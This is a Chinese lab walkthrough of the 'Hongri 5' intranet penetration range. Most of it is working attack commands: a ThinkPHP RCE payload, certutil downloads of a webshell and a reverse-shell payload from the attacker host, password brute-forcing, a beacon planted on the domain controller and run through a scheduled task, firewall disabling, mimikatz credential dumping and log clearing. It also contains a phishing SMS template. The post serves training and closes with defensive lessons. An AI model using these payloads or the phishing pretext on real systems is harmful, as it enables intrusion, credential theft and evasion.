红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路

admin 2025年2月21日23:45:36评论34 views字数 7861阅读26分12秒阅读模式
谢绝捷径的诱惑,文字才能拥有直抵人心的力量

简介

"红日5"是一个高度仿真的内网渗透实战靶场,模拟了企业级内外网混合环境。靶场包含外网Web服务器(Windows 7)、内网域控服务器(Windows Server 2008)双重网络隔离场景,涵盖ThinkPHP RCE漏洞利用、权限提升、代理穿透、横向移动、域渗透等核心攻击链。通过该靶场,学习者可掌握主机发现、漏洞利用、隧道搭建、凭证窃取、社会工程学、Pass-the-Hash等APT攻击手法,并深入理解企业内网安全防护的薄弱环节。

最近红日官网已恢复正常访问,如果懒得一个一个转存可以直接拿我的,一共500G左右,下载还请预留好一定的空间通过网盘分享的文件:红日靶场

链接: https://pan.baidu.com/s/1ppyPlm6osobxReI50fCSZw 提取码: uze8

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路

环境配置

设置好仅主机的vm2,138网段,然后我的nat模式网卡是135网段模拟公网

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218150452909

这个靶机呢一共有两个,

外网主机win7,设置好仅主机模式和nat模式两个网卡

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218141927117

内网域控服务器

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218141851494

win7

sunheart 密码:123.com

sunAdministrator 密码:dc123.com

2008(登录成功后要修改密码)

sunadmin   密码:2020.com

最重要的,需要在win7主机phpstudy开启web服务

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218153632713

网络拓扑结构,画的很潦草,看看就好

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路

外网信息打点

利用arp-scan进行主机探测

arp-scan -l
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218152945524

利用nmap对目标主机进行端口扫描

nmap -sS 192.168.135.150 -p- -A
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218154904989

目标机器开启了80、135和3306数据库远程,mysql远程测试,拒绝连接

┌──(root㉿kali)-[~]└─# mysql -uroot -h192.168.135.150 -pEnter password:ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.135.128'isnot allowed to connect to this MySQL server

查看web站点,可以看到这是一个thinkphp框架

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218155441054

随便访问一个不存在的页面,发现指纹信息,5.0.22版本

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218155520252

寻找exp

searchsploit 5.0 thinkphp
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218155744775

已知我们的版本为5.0.22

searchsploit -m 46150cat 46150.txt | grep 5.0.22
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218155831986

拼凑EXP,执行命令whoami,成功利用

http://192.168.135.150/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218160059177

查看当前目录

http://192.168.135.150/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=chdir
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218162714062

使用generate生成混淆的webshell,不容易被查杀

weevely generate cmd shell.php
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218163241182

从kali下载webshell

http://192.168.135.150/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=certutil -urlcache -split -f http://192.168.135.128:5000/shell.php
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218163341515

kali连接webshell

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218163317443

查看内网IP,发现内网网段

ipconfig
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218163429780

利用arp进行主机探测,发现域控主机192.168.138.138

arp -a
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218164106747

开始代理reGeorg,详细使用方法<a "https:="" href="https://mp.weixin.qq.com/s?__biz=Mzg2Nzk0NjA4Mg==&mid=2247498989&idx=1&sn=a860e19fe2d20c9b8aa5cc9ca81ac488&scene=21#wechat_redirect">三种代理方法打入内网

certutil -urlcache -split -f http://192.168.135.128:5000/tunnel.php
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218164621820

访问网页,发现直接报错,可能不适用windows了

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218164735123

那么切换frp,查看一下配置文件,注意这里是windows的frp,我用的版本是0.39.1,去github翻一翻历史版本的,新版本可能会出问题

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218172117291

上传到靶机上面去,有两个文件,一个程序一个配置文件

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218171454188

然后修改服务端的代理配置

vi /etc/proxychains4.conf
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250218172144094

使用proxychains打开MSF,利用永恒之蓝漏洞,打域控靶机,这里失败了

proxychains msfconsolesearch ms17_010_eternalblueuse 0set rhosts 192.168.138.138run
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220015718965

这个时候我们就可以使用端口扫描进行信息收集(连接某些未开放端口的时候可能会显示超时,这是正常现象,继续等待即可)

use scanner/portscan/tcpset RHOSTS 192.168.138.138run
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220020135920

不使用msf也可以使用nmap

proxychains nmap -Pn -sT 192.168.138.138
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220111937318

查看域信息sun.com

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220140633077

whoami并不是超级管理员也不是系统用户,这下我们就需要提权了,只有上升到系统权限才能使用mimikatz抓取hash

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220141715883

注意使用x64模块,不用msf的话也可以上传nc反弹shell

# kalimsfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=2222 LHOST=192.168.135.128 -f exe -o shellx64.exe# 靶机certutil -urlcache -split -f http://192.168.135.128:5000/shellx64.exe

进入msf

use multi/handlerset LHOST 192.168.135.128set lport 2222set payload windows/x64/meterpreter/reverse_tcprun
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220152027558

尝试使用msf的getsystem进行提权

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220171416163

创建一个监听器,用于上线靶机(同理可以用nc来上线)

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220174742540

我们生成一个可以上线CS的exe程序

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220174834327

生成到d盘中,并传到kali中

scp .beacon.exe [email protected]:/data/windows_atk

并使用msf的upload上传此文件

upload /data/windows_atk/beacon.exe C:\phpStudy\PHPTutorial\WWW\public\beacon.exe
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220181000682

执行木马

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220181040576

上线cs

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220181103072

设置延迟执行命令 sleep 0 之后,就可以开始提权了

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220181123301

尝试了各种操作后,都普通用户提权失败

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220191315382

那么能怎么办呢——域内爆破,网上很多教程都是直接登录的administrator用户,直接用CS提权成功(上线的时候就是administartor),并没有完整的复现出来从一个最普通的用户上升到系统权限的教程,本篇文章也没有复现出来,复现过程可以参考一下

信息收集,域内用户,由于当前用户是普通用户,普通用户无法直接获取域内的用户列表

shell net view
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220192358482

换思路,域内不行,那就本机用户,可以看到有一个administrator用户

shell net user
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220192519021

那么这个用户也可能是域内的管理员用户吧?我们可以利用msf的kerberos_enumusers爆破 Kerberos 服务(88 端口,前面端口扫描的时候扫出来)

proxychains msfconsoleuse gather/kerberos_enumusersset DOMAIN sun.comset RHOSTS 192.168.138.138set USERNAME Administratorset PASS_FILE /data/SecLists_Dict/Passwords/darkweb2017-top1000.txtset THREADS 4run
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220193031951

成功爆破出来用户密码为dc123.com

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220193215973

注意:如果不用CS那么可以利用 hydra 进行爆破

proxychains hydra -l Administrator -P pass.txt   -s 445 -t 4 -vV -m "SMB"  smb://192.168.138.138
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220232904488

我们尝试使用其他用户上线呢

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220194034119

我们尝试使用其他用户身份上线

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220194115989

以本地用户登录失败,那么就切换到域控服务器

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220194909812

需要让我们输入密码,但是msf上线的不是交互式shell

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220203009780

连接并查看域控,也失败

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220224209500

使用PsExec模块攻击域控,失败!

proxychains msfconsolemsf6 > use exploit/windows/smb/psexecmsf6 > set RHOSTS 192.168.138.138# 域控IPmsf6 > set SMBUser Administratormsf6 > set SMBPass dc123.commsf6 > set SMBDomain sun.commsf6 > set PAYLOAD windows/x64/meterpreter/bind_tcp  # 内网直连msf6 > run
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220204839660

试了很多方法都不行,最终以失败告终,无法登录到域控服务器/切换本地用户,或者本地提升到Administrator用户。那么就剩下最后的办法了,社工!(诈骗案例分析,请勿用于违法用途,所造成的后果自行承担)

最近张伟管理员发了一条微博:”周末加班部署新防火墙,累成狗🐶”,

并且利用一定手段获取到了手机号。

【xxx科技IT部】紧急:OA系统漏洞需立即处理,请查收邮件并登录修复平台。确认后请回复“已处理”。

到了周末,管理员成功登录了系统,启动了phpstudy这个web服务,此时即可上线

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220212328362

kali连接我们的后门

weevely terminal http://192.168.135.150/shell.php cmd
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220212414768

运行我们的木马即可上线成功

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220212724170

设置svc-exe提权方式

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220212826645

已成功上线系统权限

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220212920720

抓取本地密码hash

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220213018342

此时就能看到密码信息了

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220213147272

查看域内用户

shell net user /domain
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220213308653

使用代理转发功能

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220213741453

创建一个监听器

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220214045274

生成需要上传到域控主机上的木马

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220214146403

从本机上传上去

certutil -urlcache -split -f http://192.168.135.128:5000/shellx64.exe
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220214920086

放行4444端口

shell netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=4444
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220215028270

开始将马上传到目标服务器

shell net use \192.168.138.138ipc$ "管理员密码" /user:administratorshell net useshell dir \192.168.138.138c$ # 查看域控主机目录# 将马上传到域控服务器shell copy C:phpStudyPHPTutorialWWWpublicwin7beacon.exe \192.168.138.138c$win7beacon.exe
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220215846685

创建执行任务,提示了我们拒绝访问

sc \192.168.138.138 create shell binpath= "c:win7beacon.exe"
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220221023319

那么就用另外一种方式 at ,添加一个计划任务

shell at \192.168.138.13822:10:00 c:win7beacon.exe
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220220932740

耐心等待一分钟既可上线,而且还是最高权限,拿下域控主机

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220221601875

关闭防火墙

shell netsh advfirewall set allprofiles state off
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220222629402

修改注册表允许远程连接

shell reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220222550970

放行3389端口

shell netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220222558746

查看用户密码

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220223630815

修改代理文件,并重启frp服务

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220222716742

本机windows打开代理工具

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220222821421

可以看到我们已经能够正常访问域控主机了

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220223016749

刚进去是登录错误的,我们重新输入账号密码,登录到域sum.com

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220223528135

成功拿下域控服务器!

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220223544406

最后清理日志即可

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
image-20250220225615466

至此红日5完成

deepseek总结(部分修改)

攻击路径全景

  1. 外网突破
    • 通过 arp-scan + nmap 探测开放80/3306端口
    • 利用ThinkPHP 5.0.22 RCE漏洞( /index/thinkapp/invokefunction )
    • 上传混淆Webshell(Weevely)实现持久化控制
  2. 内网渗透
    • 发现双网卡结构(NAT+Host-Only)及内网段192.168.138.0/24
    • 使用 frp 搭建Socks5代理穿透内网边界
    • 通过 proxychains + nmap 扫描域控(192.168.138.138)暴露445端口
  3. 权限提升
    • MSF生成载荷上线失败后,通过CS的 svc-exe 提权获取SYSTEM权限
    • 利用 mimikatz 抓取本地管理员凭证(Administrator:dc123.com)
  4. 横向移动
    • IPC$共享+计划任务(net use + at)投递Beacon载荷
    • 绕过防火墙放行端口(netsh advfirewall)
    • 通过RDP(注册表修改fDenyTSConnections)接管域控桌面
  5. 权限维持
    • 域控主机部署多协议后门(MSF+CS双链路)
    • 清理日志(clearev)隐藏攻击痕迹

关键技术点

  • 漏洞利用:ThinkPHP RCE漏洞的EXP构造与混淆Webshell上传
  • 隧道搭建:Frp代理穿透双网络隔离环境
  • 权限提升:CS的svc-exe提权与Windows服务劫持
  • 横向移动:基于SMB的载荷投递与计划任务执行
  • 域渗透:Pass-the-Hash攻击与黄金票据伪造

防御启示

  1. 外网防护:及时更新框架补丁,禁用危险函数(如 system )
  2. 权限控制:遵循最小权限原则,限制数据库远程访问
  3. 网络隔离:严格ACL策略,阻断异常出站流量(如Socks隧道)
  4. 日志审计:监控计划任务创建、注册表关键项修改等可疑行为
  5. 域安全:启用LAPS管理本地管理员密码,限制域管登录范围

报告编制方:泷羽Sec安全团队日期:2025年2月21日

 

原文始发于微信公众号(泷羽Sec):红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月21日23:45:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路https://cn-sec.com/archives/3766278.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息